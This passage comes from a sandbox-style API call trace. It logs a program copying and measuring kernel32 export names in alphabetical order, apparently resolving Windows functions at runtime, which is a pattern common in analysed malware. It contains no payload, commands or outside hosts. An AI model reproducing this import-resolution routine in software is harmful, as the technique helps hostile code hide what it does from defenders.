returned="CompareCalendarDates" [0090.544] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0090.544] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0090.544] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0090.544] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0090.544] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0090.544] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0090.544] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0090.544] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0090.544] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0090.544] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0090.544] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0090.544] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0090.544] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0090.544] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0090.544] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0090.544] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0090.544] lstrlenA (lpString="COPYCONTEXT") returned 11 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0090.545] lstrlenA (lpString="COPYFILEA") returned 9 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0090.545] lstrlenA (lpString="COPYFILEEXA") returned 11 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0090.545] lstrlenA (lpString="COPYFILEEXW") returned 11 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0090.545] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0090.545] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0090.545] lstrlenA (lpString="COPYFILEW") returned 9 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0090.545] lstrlenA (lpString="COPYLZFILE") returned 10 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0090.545] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0090.545] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0090.545] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0090.545] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0090.545] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0090.545] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0090.545] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0090.545] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0090.545] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0090.545] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0090.545] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0090.545] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0090.546] lstrlenA (lpString="CREATEEVENTA") returned 12 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0090.546] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0090.546] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0090.546] lstrlenA (lpString="CREATEEVENTW") returned 12 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0090.546] lstrlenA (lpString="CREATEFIBER") returned 11 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0090.546] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0090.546] lstrlenA (lpString="CREATEFILEA") returned 11 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0090.546] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0090.546] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0090.546] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0090.546] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0090.546] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0090.546] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0090.546] lstrlenA (lpString="CREATEFILEW") returned 11 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0090.546] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0090.546] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0090.546] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0090.546] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0090.546] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0090.547] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0090.547] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0090.547] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0090.547] lstrlenA (lpString="CREATEJOBSET") returned 12 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0090.547] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0090.547] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0090.547] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0090.547] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0090.547] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0090.547] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0090.547] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0090.547] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0090.547] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0090.547] lstrlenA (lpString="CREATEPIPE") returned 10 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0090.547] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0090.547] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0090.547] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0090.547] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0090.547] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0090.548] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0090.548] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0090.548] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0090.548] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0090.548] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0090.548] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0090.548] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0090.548] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0090.548] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0090.548] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0090.548] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0090.548] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0090.548] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0090.548] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0090.548] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0090.548] lstrlenA (lpString="CREATETHREAD") returned 12 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0090.548] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0090.548] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0090.548] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0090.549] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0090.549] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0090.549] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0090.549] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0090.549] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0090.549] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0090.549] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0090.549] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0090.549] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0090.549] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0090.549] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0090.549] lstrlenA (lpString="CTRLROUTINE") returned 11 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0090.549] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0090.549] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0090.549] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0090.549] lstrlenA (lpString="DEBUGBREAK") returned 10 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0090.549] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0090.549] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0090.549] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0090.550] lstrlenA (lpString="DECODEPOINTER") returned 13 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0090.550] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0090.550] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0090.550] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0090.550] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0090.550] lstrlenA (lpString="DELETEATOM") returned 10 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0090.550] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0090.550] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0090.550] lstrlenA (lpString="DELETEFIBER") returned 11 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0090.550] lstrlenA (lpString="DELETEFILEA") returned 11 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0090.550] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0090.550] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0090.550] lstrlenA (lpString="DELETEFILEW") returned 11 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0090.550] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0090.550] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0090.550] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0090.550] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0090.550] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0090.550] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0090.551] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0090.551] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0090.551] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0090.551] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0090.551] lstrlenA 